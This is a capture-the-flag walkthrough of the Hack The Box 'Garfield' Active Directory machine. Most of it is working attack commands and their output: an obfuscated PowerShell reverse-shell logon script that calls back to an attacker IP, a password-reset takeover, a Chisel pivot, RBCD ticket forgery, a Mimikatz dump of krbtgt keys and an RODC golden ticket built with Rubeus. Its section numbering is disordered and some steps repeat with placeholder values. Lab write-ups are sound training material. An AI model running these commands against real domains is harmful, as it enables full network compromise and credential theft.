HTB Garfield Machine
1) Enumerate SMB + AD and identify scriptPath abuse
Scan target services:
nmap -sC -sV -Pn 10.129.21.254┌──(global_venv)─(w_11㉿kali)-[~/Desktop/htb/garfield]
└─$ nmap -sC -sV -Pn 10.129.21.254
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-11 08:01 UTC
Nmap scan report for 10.129.21.254
Host is up (0.021s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-11 16:01:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GARFIELD
| NetBIOS_Domain_Name: GARFIELD
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: garfield.htb
| DNS_Computer_Name: DC01.garfield.htb
| DNS_Tree_Name: garfield.htb
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-11T16:01:59+00:00
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 2026-02-13T01:10:36
|_Not valid after: 2026-08-15T01:10:36
|_ssl-date: 2026-04-11T16:02:38+00:00; +8h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-04-11T16:01:58
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m02s, deviation: 0s, median: 8h00m01sAdd host entries:
10.129.21.254 garfield.htb dc01.garfield.htb
10.129.21.254 dc01.garfield.htb DC01
10.129.21.254 rodc01.garfield.htb RODC01Collect AD graph data:
proxychains bloodhound-python -u l.wilson_adm -p 'WhoKnows123!' -d garfield.htb -ns 10.129.87.8 -c AllFrom BloodHound, identify that you can abuse scriptPath on Liz Wilson user object.
2) Upload malicious logon script to SYSVOL
Create printerDetect.bat (reverse shell payload), then upload it:
@echo off
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMgA0ADgAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
EOF┌──(global_venv)─(w_11㉿kali)-[~/Desktop/htb/garfield/solution]
└─$ smbclient //10.129.21.254/SYSVOL -U 'garfield.htb\j.arbuckle'%'Th1sD4mnC4t!@1978' -c 'cd garfield.htb\scripts; put printerDetect.bat'
putting file printerDetect.bat as \garfield.htb\scripts\printerDetect.bat (20.8 kb/s) (average 20.8 kb/s)Start listener on attacker machine:
nc -lvnp 44443) Set scriptPath and get shell as l.wilson
With the payload in place and listening, I configured the target user's scriptPath attribute to point to the malicious script using bloodyAD:
bloodyAD -u j.arbuckle -p 'Th1sD4mnC4t!@1978' \
--host dc01.garfield.htb \
set object "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb" \
scriptPath -v printerDetect.batUpon the next background login event by the affected user (l.wilson), the script was executed, returning a reverse shell:
PS C:\Windows\system32> whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
garfield\l.wilson S-1-5-21-2502726253-3859040611-225969357-3105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
4) Abuse password reset rights and take over l.wilson_adm
After obtaining a foothold, I exploited the current user's privileges to reset the password of the administrative account l.wilson_adm:
$newpass = ConvertTo-SecureString 'SomethingEasyy' -AsPlainText -Force
Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $newpass -ResetNext, I authenticated as the newly compromised administrative user over WinRM using evil-winrm:
evil-winrm -i dc01.garfield.htb -u l.wilson_adm -p 'SomethingEasyy'┌──(global_venv)─(w_11㉿kali)-[~/Desktop/htb/garfield/solution]
└─$ evil-winrm -i dc01.garfield.htb -u l.wilson_adm -p 'SomethingEasyy'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> ls
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> cd ..
*Evil-WinRM* PS C:\Users\l.wilson_adm> cd Desktop
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> ls
Directory: C:\Users\l.wilson_adm\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/11/2026 9:00 AM 34 user.txt
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> cat user.txt
3c7c3a3a1252bc8ee65abf5e6f8cf3ee
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> With access to the l.wilson_adm profile, I successfully retrieved the user flag. Because l.wilson_adm possesses high privileges, the next phase was utilizing the account to execute a Resource-Based Constrained Delegation (RBCD) attack against the Read-Only Domain Controller (RODC01) to gain total administrative access.
5) Perform RBCD Attack Against RODC01
I started by checking the privileges associated with the l.wilson_adm account:
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
===================== =============================================
garfield\l.wilson_adm S-1-5-21-2502726253-3859040611-225969357-3107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
GARFIELD\Tier 1 Group S-1-5-21-2502726253-3859040611-225969357-3108 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.To execute the RBCD attack against RODC01 using Python scripts from my attacker machine, I needed a direct pivot into the internal network environment. I uploaded chisel.exe to proxy my traffic through DC01.
upload chisel.exeI launched a Chisel server on the Kali attacker machine with a reverse SOCKS proxy listener:
chisel server -p 8000 --reverseThen, I executed the Chisel client on DC01 to connect back, enabling my SOCKS proxy setup:
.\chisel.exe client 10.10.15.248:8000 R:socksWith the pivot configured, I verified that RODC01 was directly reachable from the compromised machine so that proxychains requests could properly communicate with it:
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> ping RODC01.garfield.htb
Pinging RODC01.garfield.htb [192.168.100.2] with 32 bytes of data:
Reply from 192.168.100.2: bytes=32 time<1ms TTL=128
Reply from 192.168.100.2: bytes=32 time<1ms TTL=128
Reply from 192.168.100.2: bytes=32 time<1ms TTL=128
Reply from 192.168.100.2: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.100.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0msTo execute the RBCD attack, I required a controlled machine account that would represent the "delegated from" identity. Using the privileges of l.wilson_adm, I utilized Impacket's addcomputer.py module to provision a fake workstation account (WS01$) on the domain:
┌──(global_venv)─(w_11㉿kali)-[~/…/garfield/solution/chisel/rubeus]
└─$ impacket-addcomputer 'garfield.htb/l.wilson_adm:SomethingEasyy' -dc-ip 10.129.21.254 -computer-name 'WS01$' -computer-pass 'wulala'
/home/w_11/Desktop/global_venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account WS01$ with password wulala.With the machine account registered, I abused l.wilson_adm's administrative control over the RODC01 computer object. I modified RODC01$'s Active Directory properties, assigning WS01$ to its msDS-AllowedToActOnBehalfOfOtherIdentity attribute. This delegates authority to WS01$, granting it the ability to request Service Tickets on behalf of any user for services on RODC01$:
┌──(global_venv)─(w_11㉿kali)-[~/…/garfield/solution/chisel/rubeus]
└─$ impacket-rbcd -dc-ip 10.129.21.254 -action write -delegate-from 'WS01$' -delegate-to 'RODC01$' 'garfield.htb/l.wilson_adm:SomethingEasyy'
/home/w_11/Desktop/global_venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] WS01$ can now impersonate users on RODC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] WS01$ (S-1-5-21-2502726253-3859040611-225969357-10601)Having poisoned the Kerberos delegation properties, I launched impacket-getST to perform the S4U2self and S4U2proxy protocols. This extracted a fraudulent Kerberos Service Ticket representing the Administrator account, valid for the CIFS service on RODC01:
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ impacket-getST -dc-ip 10.129.21.254 -spn cifs/rodc01.garfield.htb -impersonate Administrator 'garfield.htb/WS01$:wulala'
/home/w_11/Desktop/global_venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_rodc01.garfield.htb@GARFIELD.HTB.ccacheI exported the resulting credential cache to my environment variables:
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ export KRB5CCNAME=Administrator@cifs_rodc01.garfield.htb@GARFIELD.HTB.ccache Relying on proxychains, I fired Impacket's psexec.py, instructing it to read the injected Kerberos ticket (-k) and establish a session targeting RODC01's internal IP (192.168.100.2). This yielded a fully functional SYSTEM shell on the domain controller:
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ proxychains impacket-psexec -k -no-pass garfield.htb/Administrator@rodc01.garfield.htb -dc-ip 10.129.21.254 -target-ip 192.168.100.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
/home/w_11/Desktop/global_venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
[*] Requesting shares on 192.168.100.2.....
[*] Found writable share ADMIN$
[*] Uploading file lUUUvjBY.exe
[*] Opening SVCManager on 192.168.100.2.....
[*] Creating service kpPM on 192.168.100.2.....
[*] Starting service kpPM.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 [!] Press help for extra shell commands
... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.2:445 ... OK
Microsoft Windows [Version 10.0.17763.8511]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>Next, to guarantee a persistent privileged path and prepare for retrieving the domain hashes, I used bloodyAD over proxychains to place l.wilson_adm directly into the RODC Administrators group.
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ proxychains bloodyAD --host 10.129.21.254 -d garfield.htb -u l.wilson_adm -p 'SomethingEasyy' add groupMember "RODC Administrators" "l.wilson_adm"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.21.254:389 ... OK
[+] l.wilson_adm added to RODC Administrators8) Modify RODC Password Replication Policy (PRP)
Since RODCs only cache credentials selectively, manipulating the Password Replication Policy (PRP) is critical. Using bloodyAD via proxychains, I evaluated and safely modified the msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes on the RODC01$ object to permit caching for the domain Administrator account:
# Get original msDS-RevealOnDemandGroup values
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object 'RODC-server$' --attr msDS-RevealOnDemandGroup
distinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local
msDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local
# Add the previous value plus the admin account
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
#If needed, remove the admin from the msDS-NeverRevealGroup attribute
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-NeverRevealGroup7) Dump krbtgt (RODC) key via Mimikatz
Next, I needed to retrieve the AES key for the krbtgt_8245 (RODC) account. I stepped back out to my proxychains setup to open an evil-winrm connection directly to RODC01. My goal was to execute Mimikatz with privilege::debug to dump the stored Kerberos keys:
*Evil-WinRM* PS C:\Windows\Temp> upload ../../../../../../usr/share/windows-resources/mimikatz/x64/mimikatz.exe
Info: Uploading /home/w_11/Desktop/htb/garfield/solution/../../../../../../usr/share/windows-resources/mimikatz/x64/mimikatz.exe to C:\Windows\Temp\mimikatz.exe
Data: 1807016 bytes of 1807016 bytes copied
Info: Upload successful!proxychains evil-winrm -i rodc01.garfield.htb -r garfield.htb --spn cifs[proxychains] Strict chain ... 127.0.0.1:1080 ... rodc01.garfield.htb:5985 ... OK
*Evil-WinRM* PS C:\Users\Administrator.GARFIELD\Documents> .\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt_8245" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::lsa /inject /name:krbtgt_8245
Domain : GARFIELD / S-1-5-21-2502726253-3859040611-225969357
RID : 00000643 (1603)
User : krbtgt_8245
* Primary
NTLM : 445aa4221e751da37a10241d962780e2
LM :
Hash NTLM: 445aa4221e751da37a10241d962780e2
ntlm- 0: 445aa4221e751da37a10241d962780e2
lm - 0: 0ab3d34a182bb016fc4cfd26544a9f16
* WDigest
01 6d31d1f92ef6d85f5517944f98bf5753
02 8c46bd5ddc680291e70800990dbc02e3
03 9ffbc24f29b9bb3df3c32b76631ff874
04 6d31d1f92ef6d85f5517944f98bf5753
05 8c46bd5ddc680291e70800990dbc02e3
06 8fc97c500bf9c7c4a0d34a497f9c5245
07 6d31d1f92ef6d85f5517944f98bf5753
08 c4bac61b7ecb407d358f836d2f4e19c6
09 c4bac61b7ecb407d358f836d2f4e19c6
10 d8938c80e1e0c80a2ec1d8b06f42cb31
11 67f002aa49f4400fa970a53e294f4bee
12 c4bac61b7ecb407d358f836d2f4e19c6
13 56062e2db43bc0069deb86de87509ca6
14 67f002aa49f4400fa970a53e294f4bee
15 7250fcfc09d9cb93345c0c1393e19e52
16 7250fcfc09d9cb93345c0c1393e19e52
17 04b30cd8b5381d4b8458b0c996503a91
18 b48bda9ef98982d5ee33766a74880e01
19 bb365cf4f0bcdadf35b6a9b04c58257b
20 85addbd6d603cca1b500f2da02b205d0
21 b6186618611e202aae4141716e6603f5
22 b6186618611e202aae4141716e6603f5
23 f3f6c9408db132bf8e59413b7b40bb16
24 0acf88cc5cb3b35888708ebefe658b6f
25 0acf88cc5cb3b35888708ebefe658b6f
26 08b8941632a5017e7178a3761dfaf7fb
27 c1b2fd89d0dafb5f9e18147042bdc433
28 712f0b6ed3b7eb7f6f135a1e298c4e09
29 bf8d51270f7f657079bb9744446d70cb
* Kerberos
Default Salt : GARFIELD.HTBkrbtgt_8245
Credentials
des_cbc_md5 : d540fe6192b9ecfe
* Kerberos-Newer-Keys
Default Salt : GARFIELD.HTBkrbtgt_8245
Default Iterations : 4096
Credentials
aes256_hmac (4096) : d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
aes128_hmac (4096) : 124c0fd09f5fa4efca8d9f1da91369e5
des_cbc_md5 (4096) : d540fe6192b9ecfe
* NTLM-Strong-NTOWF
Random Value : f4b51c2c0d006172304e31dbc6e0de6b
mimikatz(commandline) # exit
Bye!Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/Garfield.htb /dc:dc01.garfield.htb /ticket:doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAAooIEIgSCBB6wYzn83b93Yjf6RlQaOADVrbH6LHjXmVTG/7Xn+r6jIbG+8hEkPs0P5EgBebc73NyTStEdA6vgjgfG7P8JVMGuCD10lhFW140YUHQN+Ymc8iHOWTVhQHQqId3HQ8iaEv2tLr51WS3fiuqm8ACY1zSKaNkO5lawSxZZ57UF864xAqLZUZG3bzxKLmk97PGoGKrEgzoOZ82b+BAcivToQ0tLbW2Wv/xaDxCDQ503TzMjoS2CaGSJGLyG9i6nR+q4DUJL3g2ZvKKw/l7olJWveOv8RIilSKQW8L859B/5u4Q9u6F8VcYzB7V7kEZ/q2lQ1dG/ea4jjKSgjOx1ahfhNRvcZQ2VzGpvPSgfIcKspLZPSH0Zi94egFMrXB2/xAKIGmof8QEBOGE/cW3qTliTPuEXiPyZ0TGO0vDyYhmuXiDDDQtbGT0AR/jqL0JN2i+KLjir++DWg0WoEyTf0cH+90/j+Co20iv+ljMJwTAYjP8laJEbNPuketBRfAT783gRLPVEJQ1uFvgcK7jlKgNANwuY2s88JarD5HKdcaKSmqCA7Y5ZEB+hMvuP97mVEX5UeqAmCfHpdtqo6fPrchKMrL+Ombgr8/UUs+ndsq6ldnEJeEQrYw93of65C7cGVJxFbTjxj/xdRqX+HPCi7I1WNSYw3zxgiqSpqqumq88DzYCRzD7z/O9dH/1oyviH8FlCc/k908BQcwcRw7izDtOmF87KXMPACwijIQmTx4dqHznAuq5JAwV+yaJFhX+LRgNuoc7XNZJboXwg0tNqt2aJDYlGuZr6tt7AdrSytbF6bO+4KfI4KhdArE4RdgyqsL2/3Kht/K1IfZWaPithLD2vgK3fuiYOCJVe8CSvpdKhN22qmAmNNTvx3BJ3UHR+CFf9tmlcg5zwm9CijnMLPqWuHZZfWwdonPzAywCrU6mtga04n3zYCp44mCeOsuadl0SRyxxCJ2zh7VyW6J7D2s/Mt851dp738P6doClbZhrALe5D7cF8Ji3wKgvcd5kfEuSbn3SsUdv+bPq9i5UsX24NCfhOnwP3xNTkrJzk1bnnZKF0mD5MZRkAiXPl4ift1ry7yOtolKYGL7fK1Ro+4/2GX+JjWt0T/VGsyyh7T1GSq9jHFJu/e2oGTUFme7npEB6ia1oiQWmQgFTdi+z5IxgavgM/9Tug/KoJwo/0cZCD+sZVZttVJr43eKsiXfCOhNPOooekDkc/nfMG9wmY4HcFNUWi1Ic9C075YXbyazaumX7QJ2dfI8X4Hf/7IEa8c5R6Bm2GtR+E1a4hZVEF7dZ3VTLPlXWp8sllGf3A5S4zIVadP5ZxikCvJinCW2w9EbOvF4jSVLTdfBxROkuvwt0dGRAB2N23tfyKM9/ELloqcqXRuDltjmDfPrkFliA0K828o4H+MIH7oAMCAQCigfMEgfB9ge0wgeqggecwgeQwgeGgKzApoAMCARKhIgQgbRkot+QXK+whtSqz/GKv4NXOp9PuFouuMVUAkgWhw2ahDhsMR0FSRklFTEQuSFRCohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQIEAAKQRGA8yMDI2MDQxMTIyMDYzMlqlERgPMjAyNjA0MTEyMjA2MzJaphEYDzIwMjYwNDEyMDgwNjMyWqcRGA8yMDI2MDQxODIyMDYzMlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxnYXJmaWVsZC5odGI=Rubeus.exe golden /rodcNumber:$KBRTGT_8245/flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:administrator_2026_04_11_22_06_32_Administrator_to_krbtgt@GARFIELD.HTB.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:Administrator /id:USER_RID /domain:domain.local /sid:DOMAIN_SID
.\Rubeus.exe golden /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357 /user:Administrator /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:administrator.kirbi
./Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/Garfield.htb /dc:rodc01.garfield.htb /ticket:
With the credentials extracted, the attack path explores using managedBy abuse as an alternative to compromise RODC01$. Adding l.wilson_adm to the managedBy attribute links the accounts:
bloodyAD --host 10.129.21.254 -d garfield.htb -u l.wilson_adm -p 'SomethingEasyy' set object 'RODC01$' managedBy -v 'CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb'We also verify reachability for the alternative attack paths:
nslookup RODC01.garfield.htb6) Summary of the RBCD Execution
To consolidate the method executed in Step 5, successfully performing the RBCD attack required the following sequential logic:
- Create a machine account you control: A fake workstation (
WS01$) was injected into the domain. - Write RBCD from controlled machine to RODC target: The
msDS-AllowedToActOnBehalfOfOtherIdentityattribute onRODC01was updated. - Request impersonated service ticket to RODC: S4U constraints were abused with
impacket-getSTto fabricate a service ticket. - Use ticket and execute on RODC:
proxychainsloaded the Kerberos ticket intopsexec.pyto establish a persistent interactive SYSTEM session.
At this point you should have SYSTEM-level execution context on RODC01.
7) Dump krbtgt (RODC) key
Run credential extraction and kerberos key-listing:
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit".\Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/Garfield.htb /dc:DC01.garfield.htb9) Forge RODC Golden Ticket
Using the previously listed krbtgt_8245 AES256 key, I injected a custom RODC Golden Ticket using Rubeus directly through the l.wilson_adm namespace:
*Evil-WinRM* PS C:\Users\Administrator.GARFIELD\Documents> .\Rubeus.exe golden /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357 /user:Administrator /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:administrator.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Build TGT
[*] Building PAC
[*] Domain : GARFIELD.HTB (GARFIELD)
[*] SID : S-1-5-21-2502726253-3859040611-225969357
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : garfield.htb
